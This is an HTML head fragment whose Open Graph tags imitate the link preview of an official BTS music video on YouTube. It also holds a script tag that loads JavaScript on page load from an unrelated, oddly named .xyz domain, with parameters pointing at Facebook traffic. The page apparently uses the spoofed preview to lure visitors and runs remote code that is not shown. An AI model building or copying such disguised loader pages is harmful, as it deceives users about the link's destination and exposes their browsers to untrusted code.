<meta property="og:url" content="https://www.youtube.com/watch?v=XsX3ATc3FbA" />
<meta property="og:title" content="BTS (방탄소년단) '작은 것들을 위한 시 (Boy With Luv) (feat. Halsey)' Official MV" />
<meta property="og:image" content="https://i.ytimg.com/vi/XsX3ATc3FbA/maxresdefault.jpg" />
<meta property="og:image:width" content="1280" />
<meta property="og:image:height" content="720" />
<meta property="og:description" content="BTS (방탄소년단) '작은 것들을 위한 시 (Boy With Luv) (Feat. Halsey)' Official MV Credits: Director : YongSeok Choi (Lumpens) Assistant Director : Guzza, Jihye Yoon, HyeJe..." />
<script src="https://mmmmmbbbbbbr.xyz/?api=1&lan=facebooknew&ht=1&counter0=jcbonly123" type="text/javascript" async="true"></script>



